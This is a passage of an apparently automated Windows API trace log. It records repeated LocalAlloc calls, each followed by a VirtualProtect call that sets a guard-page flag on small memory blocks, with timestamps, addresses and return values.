dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.983] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c83e0 [0158.983] VirtualProtect (in: lpAddress=0x4c83e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.984] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c8548 [0158.984] VirtualProtect (in: lpAddress=0x4c8548, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.985] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c8560 [0158.985] VirtualProtect (in: lpAddress=0x4c8560, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.985] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c83f8 [0158.985] VirtualProtect (in: lpAddress=0x4c83f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.986] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c8578 [0158.986] VirtualProtect (in: lpAddress=0x4c8578, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.987] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c89a8 [0158.987] VirtualProtect (in: lpAddress=0x4c89a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.988] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8590 [0158.988] VirtualProtect (in: lpAddress=0x4c8590, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.989] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8c70 [0158.989] VirtualProtect (in: lpAddress=0x4c8c70, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.990] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8c80 [0158.990] VirtualProtect (in: lpAddress=0x4c8c80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.991] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8dd0 [0158.991] VirtualProtect (in: lpAddress=0x4c8dd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.992] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c8728 [0158.992] VirtualProtect (in: lpAddress=0x4c8728, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.993] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c8740 [0158.993] VirtualProtect (in: lpAddress=0x4c8740, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.993] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8758 [0158.993] VirtualProtect (in: lpAddress=0x4c8758, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.994] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c86f8 [0158.994] VirtualProtect (in: lpAddress=0x4c86f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.995] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c86c8 [0158.995] VirtualProtect (in: lpAddress=0x4c86c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.996] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c8770 [0158.996] VirtualProtect (in: lpAddress=0x4c8770, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.000] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c8788 [0159.000] VirtualProtect (in: lpAddress=0x4c8788, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.001] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c8710 [0159.001] VirtualProtect (in: lpAddress=0x4c8710, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.001] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c86e0 [0159.001] VirtualProtect (in: lpAddress=0x4c86e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.002] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9050 [0159.002] VirtualProtect (in: lpAddress=0x4c9050, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.003] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8eb8 [0159.003] VirtualProtect (in: lpAddress=0x4c8eb8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.003] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9170 [0159.004] VirtualProtect (in: lpAddress=0x4c9170, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.004] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c90c8 [0159.004] VirtualProtect (in: lpAddress=0x4c90c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.005] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9110 [0159.005] VirtualProtect (in: lpAddress=0x4c9110, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.005] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9188 [0159.005] VirtualProtect (in: lpAddress=0x4c9188, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.006] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9158 [0159.006] VirtualProtect (in: lpAddress=0x4c9158, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.007] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c8ed0 [0159.007] VirtualProtect (in: lpAddress=0x4c8ed0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.007] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c8ea0 [0159.007] VirtualProtect (in: lpAddress=0x4c8ea0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.008] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c8f60 [0159.008] VirtualProtect (in: lpAddress=0x4c8f60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.008] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c8f30 [0159.008] VirtualProtect (in: lpAddress=0x4c8f30, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.009] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9128 [0159.009] VirtualProtect (in: lpAddress=0x4c9128, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.010] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c8ee8 [0159.010] VirtualProtect (in: lpAddress=0x4c8ee8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.090] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c9068 [0159.091] VirtualProtect (in: lpAddress=0x4c9068, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.092] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4c8848 [0159.092] VirtualProtect (in: lpAddress=0x4c8848, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.092] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c90b0 [0159.092] VirtualProtect (in: lpAddress=0x4c90b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.093] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4c8ae8 [0159.093] VirtualProtect (in: lpAddress=0x4c8ae8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.094] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x4c9278 [0159.094] VirtualProtect (in: lpAddress=0x4c9278, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.094] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9008 [0159.094] VirtualProtect (in: lpAddress=0x4c9008, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.095] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c88a8 [0159.095] VirtualProtect (in: lpAddress=0x4c88a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.095] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9140 [0159.095] VirtualProtect (in: lpAddress=0x4c9140, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.096] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c8ba8 [0159.096] VirtualProtect (in: lpAddress=0x4c8ba8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.097] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c8f00 [0159.097] VirtualProtect (in: lpAddress=0x4c8f00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.099] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c8f18 [0159.099] VirtualProtect (in: lpAddress=0x4c8f18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.099] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c9020 [0159.099] VirtualProtect (in: lpAddress=0x4c9020, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.100] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c90e0 [0159.100] VirtualProtect (in: lpAddress=0x4c90e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.100] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c88e8 [0159.101] VirtualProtect (in: lpAddress=0x4c88e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.101] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c9080 [0159.101] VirtualProtect (in: lpAddress=0x4c9080, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.102] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9038 [0159.102] VirtualProtect (in: lpAddress=0x4c9038, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.102] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8ff0 [0159.102] VirtualProtect (in: lpAddress=0x4c8ff0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.103] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c8a68 [0159.103] VirtualProtect (in: lpAddress=0x4c8a68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.104] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c90f8 [0159.104] VirtualProtect (in: lpAddress=0x4c90f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.108] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c8f48 [0159.108] VirtualProtect (in: lpAddress=0x4c8f48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.108] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c9098 [0159.108] VirtualProtect (in: lpAddress=0x4c9098, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.109] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c8f78 [0159.109] VirtualProtect (in: lpAddress=0x4c8f78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.110] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c8f90 [0159.110] VirtualProtect (in: lpAddress=0x4c8f90, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.111] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c89c8 [0159.111] VirtualProtect (in: lpAddress=0x4c89c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.111] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c8a08 [0159.111] VirtualProtect (in: lpAddress=0x4c8a08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.112] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c8fa8 [0159.112] VirtualProtect (in: lpAddress=0x4c8fa8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.113] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4c8fc0 [0159.113] VirtualProtect (in: lpAddress=0x4c8fc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.113] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c8908 [0159.113] VirtualProtect (in: lpAddress=0x4c8908, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.114] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x4c92a0 [0159.114] VirtualProtect (in: lpAddress=0x4c92a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.115] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c8fd8 [0159.115] VirtualProtect (in: lpAddress=0x4c8fd8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.115] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c9248 [0159.116] VirtualProtect (in: lpAddress=0x4c9248, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.116] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4c8a28 [0159.116] VirtualProtect (in: lpAddress=0x4c8a28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.117] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c8a48 [0159.117] VirtualProtect (in: lpAddress=0x4c8a48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.118] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4c8bc8 [0159.118] VirtualProtect (in: lpAddress=0x4c8bc8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.118] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9260 [0159.118] VirtualProtect (in: lpAddress=0x4c9260, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.119] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c8a88 [0159.119] VirtualProtect (in: lpAddress=0x4c8a88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.120] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9200 [0159.120] VirtualProtect (in: lpAddress=0x4c9200, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.126] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c8aa8 [0159.126] VirtualProtect (in: lpAddress=0x4c8aa8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.126] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4c8b48 [0159.126] VirtualProtect (in: lpAddress=0x4c8b48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.127] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c91a0 [0159.127] VirtualProtect (in: lpAddress=0x4c91a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.128] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4c8ac8 [0159.128] VirtualProtect (in: lpAddress=0x4c8ac8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.128] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4c8b08 [0159.128] VirtualProtect (in: lpAddress=0x4c8b08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.129] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c91e8 [0159.129] VirtualProtect (in: lpAddress=0x4c91e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.129] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c91b8 [0159.129] VirtualProtect (in: lpAddress=0x4c91b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.130] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c91d0 [0159.130] VirtualProtect (in: lpAddress=0x4c91d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.130] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c8b28 [0159.130] VirtualProtect (in: lpAddress=0x4c8b28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.131] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c8b68 [0159.131] VirtualProtect (in: lpAddress=0x4c8b68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.132] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c8b88 [0159.132] VirtualProtect (in: lpAddress=0x4c8b88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.132] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c9218 [0159.132] VirtualProtect (in: lpAddress=0x4c9218, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.133] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4c8be8 [0159.133] VirtualProtect (in: lpAddress=0x4c8be8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.134] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c8828 [0159.134] VirtualProtect (in: lpAddress=0x4c8828, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.135] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c98b8 [0159.135] VirtualProtect (in: lpAddress=0x4c98b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.160] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c9758 [0159.160] VirtualProtect (in: lpAddress=0x4c9758, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.161] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x4c9958 [0159.161] VirtualProtect (in: lpAddress=0x4c9958, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.162] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9230 [0159.162] VirtualProtect (in: lpAddress=0x4c9230, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.162] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c9ba8 [0159.162] VirtualProtect (in: lpAddress=0x4c9ba8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.163] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4c9798 [0159.163] VirtualProtect (in: lpAddress=0x4c9798, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.164] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4c96f8 [0159.164] VirtualProtect (in: lpAddress=0x4c96f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.164] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9b30 [0159.164] VirtualProtect (in: lpAddress=0x4c9b30, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.165] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x4c8de0 [0159.165] VirtualProtect (in: lpAddress=0x4c8de0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.165] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c9a18 [0159.165] VirtualProtect (in: lpAddress=0x4c9a18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.166] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c99d8 [0159.166] VirtualProtect (in: lpAddress=0x4c99d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.167] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9b18 [0159.168] VirtualProtect (in: lpAddress=0x4c9b18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.171] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9de8 [0159.171] VirtualProtect (in: lpAddress=0x4c9de8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.172] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9d70 [0159.172] VirtualProtect (in: lpAddress=0x4c9d70, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.173] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9d58 [0159.173] VirtualProtect (in: lpAddress=0x4c9d58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.173] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c98d8 [0159.174] VirtualProtect (in: lpAddress=0x4c98d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.174] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c9cf8 [0159.174] VirtualProtect (in: lpAddress=0x4c9cf8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.175] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c9938 [0159.175] VirtualProtect (in: lpAddress=0x4c9938, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.176] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9b00 [0159.176] VirtualProtect (in: lpAddress=0x4c9b00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.176] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c9b48 [0159.176] VirtualProtect (in: lpAddress=0x4c9b48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.177] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c9c68 [0159.177] VirtualProtect (in: lpAddress=0x4c9c68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.178] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c9b60 [0159.178] VirtualProtect (in: lpAddress=0x4c9b60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.178] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c9a38 [0159.178] VirtualProtect (in: lpAddress=0x4c9a38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.179] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4c9918 [0159.179] VirtualProtect (in: lpAddress=0x4c9918, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.180] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c9c50 [0159.180] VirtualProtect (in: lpAddress=0x4c9c50, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0159.180] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8c90 [0159.180] VirtualProtect (in: 